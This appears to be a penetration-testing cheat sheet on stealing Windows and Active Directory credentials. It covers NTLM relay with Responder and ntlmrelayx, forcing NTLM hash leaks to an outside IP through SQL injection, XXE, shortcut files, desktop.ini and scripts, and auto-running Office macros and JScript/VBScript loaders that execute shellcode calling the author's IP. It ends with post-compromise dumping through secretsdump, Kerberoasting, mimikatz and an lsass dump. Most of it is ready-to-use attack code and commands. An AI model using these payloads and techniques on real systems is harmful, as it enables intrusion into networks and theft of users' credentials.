Responder
Responder¶
Responder is used to get user Hashes of users on the local network
Edit the Responder.conf file to look like the one below
[Responder Core]
; Servers to start
SQL = On
SMB = Off # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off # Turn this off
HTTPS = On
DNS = On
LDAP = On
Running Responder:
responder -I eth0 -wrfbdFP --lm
Responder.py -bwrd --lm -i IP
Generate IPs in Subnet that don't have SMB Signing:
cme smb 192.168.1.0/24 --gen-relay-list targets.txt
MultiRelay¶
Get this tool by installing impacket
Relays authenticated NTLMv1 and NTLMv2 connections using HTTP, WebDav, Proxy and SMB authentications to an SMB server.
When the connections are made to the SMB server they try to spawn a Windows Service with a command shell.
This command shell allows an attacker to use the authentication of the original user to
- Remotely dump the LM and NT hashes on the target.
- Remotely dump any registry keys under HKLM.
- Read any file on the target.
- Download any file on the target.
- Execute any command as System on the target.
Triggering on All Users:
./tools/MultiRelay.py -t Target_IP -u ALL
Triggering on specific Users:
./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin
Auto Dump SAM on connection:
./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin -d
RunFinger¶
This tool is used to quickly scan an IP range and get information about the Workstations.
Note
Newer systems do not have SMB signing by default
Checking if SMBSigning is enabled:
root@lgandx:~/Responder-2.3.3.0# ./tools/RunFinger.py -g -i 10.10.20.0/24
[10.10.20.41: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
[10.10.20.36: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']
[10.10.20.22: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
[10.10.20.43: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
[10.10.20.49: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'True']
[10.10.20.35: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']
[10.10.20.40: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']
....
NTLMRelay¶
Relay Hashes and Dump NTHashes
ntlmrelayx.py -tf targets.txt
Relay Hashes and Run Custom Command
ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
Attacking Newer Systems¶
Attacking Group Managed Service Accounts
Triggering NTLM relay Requests¶
https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/
https://blog.smallsec.ca/2016/11/07/windows-credentials/
LFI¶
The include() in PHP will resolve the network path for us.
http://host.tld/?page=//11.22.33.44/@OsandaMalith
XXE¶
In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >
]>
<root>
<name></name>
<tel></tel>
<email>OUT&xxe;OUT</email>
<password></password>
</root>
XPath Injection¶
Usually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
MySQL Injection¶
I have written a complete post on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
MSSQL¶
Since stacked queries are supported we can call stored procedures.
';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
Regsvr32¶
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
Batch¶
There are many possible ways you can explore
echo 1 > //192.168.0.1/abc
pushd \\192.168.0.1\abc
cmd /k \\192.168.0.1\abc
cmd /c \\192.168.0.1\abc
start \\192.168.0.1\abc
mkdir \\192.168.0.1\abc
type\\192.168.0.1\abc
dir \\192.168.0.1\abc
find \\192.168.0.1\abc
findstr
copy
xcopy
move
replace
del
rename
Auto-Complete¶
You just need to type \\host\ the auto-complete will do the trick under the explorer and the run dialog box.
Autorun.inf¶
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
Shell Command Files¶
You can save this as something.scf and once you open the folder explorer will try to resolve the network path for the icon.
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
[Taskbar]
Command=ToggleDesktop
Desktop.ini¶
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
Shortcut Files (.lnk)¶
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
The Powershell version.
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Internet Shortcuts (.url)¶
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
Autorun with Registry¶
You can add a new registry key in any of the following paths.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Powershell¶
There are probably many scriptlets in Powershell that would resolve a network path.
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
IE¶
IE will resolve UNC paths. For example
<img src="\\\\192.168.0.1\\aa">
You can inject under XSS or in scenarios you find SQL injection. For example.
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
VBScript¶
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
You can apply in web pages but this works only with IE.
<html>
<script type="text/Vbscript">
<!--
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
//-->
</script>
</html>
Here’ the encoded version. You can encode and save this as something.vbe
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
<html>
<script type="text/Vbscript.Encode">
<!--
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
//-->
</script>
</html>
JScript¶
You can save this as something.js under windows.
var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
You can apply the same in html files but only works with IE. Also you can save this as something.hta.
<html>
<script type="text/Jscript">
<!--
var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
//-->
</script>
</html>
Here’s the encoded version. You can save this as something.jse.
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
The html version of this.
<html>
<script type="text/Jscript.Encode">
<!--
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
//-->
</script>
</html>
Windows Script Files¶
Save this as something.wsf.
<package>
<job id="boom">
<script language="VBScript">
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
</script>
</job>
</package>
Shellcode
Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
/*
Title: CreateFile Shellcode
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Size: 368 Bytes
*/
# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>
int main() {
char *shellcode =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05"
"\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10"
"\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0"
"\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8"
"\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a"
"\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff"
"\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
"\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
"\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
"\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
"\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
"\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
"\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
"\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
"\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
"\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
DWORD oldProtect;
wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
if (!ret) {
fprintf(stderr, "%s", "Error Occured");
return EXIT_FAILURE;
}
((void(*)(void))shellcode)();
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
return EXIT_SUCCESS;
}
Shellcode Inside Macros¶
Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' This is a word/excel macro. This can be used in vb6 applications as well
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Long, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As Long, _
ByRef Source As Any, _
ByVal Length As Long) As Long
#EndIf
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Sub Auto_Open()
Dim source As Long, i As Long
#If Vba7 Then
Dim lpMemory As LongPtr, lResult As LongPtr
#Else
Dim lpMemory As Long, lResult As Long
#EndIf
Dim bShellcode(376) As Byte
bShellcode(0) = 232
bShellcode(1) = 255
bShellcode(2) = 255
bShellcode(3) = 255
bShellcode(4) = 255
bShellcode(5) = 192
bShellcode(6) = 95
bShellcode(7) = 185
bShellcode(8) = 85
bShellcode(9) = 3
bShellcode(10) = 2
bShellcode(11) = 2
bShellcode(12) = 129
bShellcode(13) = 241
bShellcode(14) = 2
bShellcode(15) = 2
bShellcode(16) = 2
.....................
lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
For i = LBound(bShellcode) To UBound(bShellcode)
source = bShellcode(i)
lResult = RtlMoveMemory(lpMemory + i, source, 1)
Next i
lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Shellcode Inside VBS and JS¶
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.
http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.
Note the following shellcode directs to my IP.
JScript:
/*
* Author : Osanda Malith Jayathissa (@OsandaMalith)
* Title: Shellcode to request a non-existing network path
* Website: https://osandamalith.com
* Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
* Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
*/
DX = new ActiveXObject("DynamicWrapperX");
DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" );
DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");
var MEM_COMMIT = 0x1000;
var PAGE_EXECUTE_READWRITE = 0x40;
var sc = [
0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa,
0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0,
0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05,
0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e,
0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d,
0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b,
0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1,
0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b,
0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c,
0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b,
0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18,
0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c,
0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75,
0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7,
0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];
var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
for(var i = 0; i < sc.length; i++) DX.NumPut(sc[i],scLocation,i);
var thread = DX.CreateThread(0,0,scLocation,0,0);
//https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js
VBScript
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith.com
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
DX.Register "kernel32.dll","CreateThread","i=uullu","r=u"
DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
shellcode = Array( _
&He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _
&H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _
&H8b, &Hfe, &H81, &Hc6, &H29, &H01, &H05, &H05, &Hb9, &H02, &H05, &H05, &H05, &Hfc, &Had, &H01, &H3c, &H07, &He2, &Hfa, _
&H56, &Hb9, &H8d, &H10, &Hb7, &Hf8, &He8, &H5f, &H05, &H05, &H05, &H68, &H31, &H01, &H05, &H05, &Hff, &Hd0, &Hb9, &He0, _
&H53, &H31, &H4b, &He8, &H4e, &H05, &H05, &H05, &Hb9, &Hac, &Hd5, &Haa, &H88, &H8b, &Hf0, &He8, &H42, &H05, &H05, &H05, _
&H6a, &H05, &H68, &H80, &H05, &H05, &H05, &H6a, &H03, &H6a, &H05, &H6a, &H01, &H68, &H05, &H05, &H05, &H80, &H68, &H3e, _
&H01, &H05, &H05, &Hff, &Hd0, &H6a, &H05, &Hff, &Hd6, &H33, &Hc0, &H5e, &Hc3, &H33, &Hd2, &Heb, &H10, &Hc1, &Hca, &H0d, _
&H3c, &H61, &H0f, &Hbe, &Hc0, &H7c, &H03, &H83, &He8, &H20, &H03, &Hd0, &H41, &H8a, &H01, &H84, &Hc0, &H75, &Hea, &H8b, _
&Hc2, &Hc3, &H8d, &H41, &Hf8, &Hc3, &H55, &H8b, &Hec, &H83, &Hec, &H14, &H53, &H56, &H57, &H89, &H4d, &Hf4, &H64, &Ha1, _
&H30, &H05, &H05, &H05, &H89, &H45, &Hfc, &H8b, &H45, &Hfc, &H8b, &H40, &H0c, &H8b, &H40, &H14, &H89, &H45, &Hec, &H8b, _
&Hf8, &H8b, &Hcf, &He8, &Hd2, &Hff, &Hff, &Hff, &H8b, &H70, &H18, &H8b, &H3f, &H85, &Hf6, &H74, &H4f, &H8b, &H46, &H3c, _
&H8b, &H5c, &H30, &H78, &H85, &Hdb, &H74, &H44, &H8b, &H4c, &H33, &H0c, &H03, &Hce, &He8, &H96, &Hff, &Hff, &Hff, &H8b, _
&H4c, &H33, &H20, &H89, &H45, &Hf8, &H33, &Hc0, &H03, &Hce, &H89, &H4d, &Hf0, &H89, &H45, &Hfc, &H39, &H44, &H33, &H18, _
&H76, &H22, &H8b, &H0c, &H81, &H03, &Hce, &He8, &H75, &Hff, &Hff, &Hff, &H03, &H45, &Hf8, &H39, &H45, &Hf4, &H74, &H1c, _
&H8b, &H45, &Hfc, &H8b, &H4d, &Hf0, &H40, &H89, &H45, &Hfc, &H3b, &H44, &H33, &H18, &H72, &Hde, &H3b, &H7d, &Hec, &H75, _
&H9c, &H33, &Hc0, &H5f, &H5e, &H5b, &Hc9, &Hc3, &H8b, &H4d, &Hfc, &H8b, &H44, &H33, &H24, &H8d, &H04, &H48, &H0f, &Hb7, _
&H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _
&H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _
&H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05)
scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
For i =LBound(shellcode) to UBound(shellcode)
DX.NumPut shellcode(i),scLocation,i
Next
thread = DX.CreateThread (0,0,scLocation,0,0)
After Getting an account¶
Upload Files to the target system:
>>> smbclient.py winlab.com/[email protected]
Password:
Type help for list of commands
# use c$
# put /opt/procdump/procdump64.exe
# exit
Test that credentials are valid:
>>> cme smb 192.168.0.253 -u user1 -p password -d CORP
Test that local hashes are valid:
>>> cme smb 10.2.16.66 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:d405284cd5e3ff57dd16f530a36e9e1e --local-auth
Get a Remote Command Shell:
>>> impacket-wmiexec "CORP/user1:password"@10.100.43.204
C:\>whoami
CORP\user1
Finding the Domain Controller¶
Find the IP address of the Domain Controller:
C:\>nslookup asdf
*** il-ad-wp4.CORP.local can't find asdf: Non-existent domain
Server: il-ad-wp4.CORP.local
Address: 10.2.16.66
BloodHound¶
Faster Injestor C#
Faster Injestor Powershell
Identify domain admins:
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
Stealthy Identify domain admins:
Situational Awareness Host Enumeration
Marking Users that we control:
from neo4j.v1 import GraphDatabase
import sys
driver = None
def init_driver(database, user, password):
global driver
uri = "bolt://%s:7687" % database
driver = GraphDatabase.driver(uri, auth=(user, password))
return driver
def close_driver():
global driver
driver.close()
init_driver('localhost', 'neo4j', 'BloodHound')
with open(sys.argv[1]) as infile:
q = "MATCH (n:User {name: {name}}) SET n.owned = true"
with driver.session() as session:
for line in infile:
user = '%s@%s' % (line.strip().upper(), sys.argv[2].upper())
fromres = session.run(q, name=user)
BloodHound.py¶
Python Version of BloodHound for Linux
Use BloodHound to get all of the computers, users and their connections:
>>> ./bloodhound.py -u user1 -p password -d CORP.local -dc 10.2.16.66
>>> zip a.zip *.json
Import the json files into the neo4j database.
Try to see if there is a way to get directly to domain admin from the compromised accounts. By using the road maps.
Dumping Creds¶
When you have a user that is local admin on a box you can use it to dump hashes of other users on the box.
Impact-SecretsDump:
root@kali:~# impacket-secretsdump "CORP/user1:password"@10.100.43.204
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: [REMOVED]]
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:11111111111114eeaad3b435b51404ee:1111111111113ff57dd16f530a36e9e1e:::
Guest:501:11111111111114eeaad3b435b51404ee:1111111111111131b73c59d7e0c089c0:::
hudson:1003:11111111111114eeaad3b435b51404ee:1111111111111111e27cbfbabaf2f8860:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/admin1:$DCC2$10240#admin1#111111196b6ceb7653cb3e406a18b5e6
CORP.LOCAL/admin2:$DCC2$10240#admin2#1111111a5186277aadbcba3b59d37a3c
CORP.LOCAL/user1:$DCC2$10240#user1#1111111111d924879545f330427243cae
CORP.LOCAL/admin3:$DCC2$10240#admin3#111111119b768776c8caf9955d3d1331
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\WIN2012R2MYSQL$:aes256-cts-hmac-sha1-96:111111111111111111192903d328e87a5881d5d1abf5d92876ee70a41f8fa0d3
CORP\WIN2012R2MYSQL$:aes128-cts-hmac-sha1-96:11111111111119c314717c02e1d041b9
CORP\WIN2012R2MYSQL$:des-cbc-md5:11111111dfdb5a4
CORP\WIN2012R2MYSQL$:11111111111114eeaad3b435b51404ee:1111111111118a98b72ddb658f79ecae6:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xfc83ab3e1d7dc9ed983fc31111111111111111111
dpapi_userkey:0x8b8de7e43fe9a47e6792f28e111111111111111111
[*] NL$KM
[...]
NL$KM:111111111111111111111111d92fcd57caff9865489642531c900a3d149ecd2d5f7b674a561412999b1379badfe1418eccd860bcb2c5aa644a902cc8db1685c4
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Kerberosting¶
When you have credentials for a user on the Domain you can make a request to the Domain Controller to get Weakly encrypted credentials for all users.
root@kali:~# impacket-GetUserSPNs -request -dc-ip 10.2.16.66 CORP.local/user1
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
Password:
[...]
How to Fix Kerberosting¶
https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/
Inveigh¶
For Windows to get Windows password Hashes
mimikatz¶
Dump LSA Secrets:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
Invoke-Mimikatz -Command "token::elevate lsadump::secrets"
Dump Memory of LSA Service for offline mimikatz:
#Dump Lsass memory on target system
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
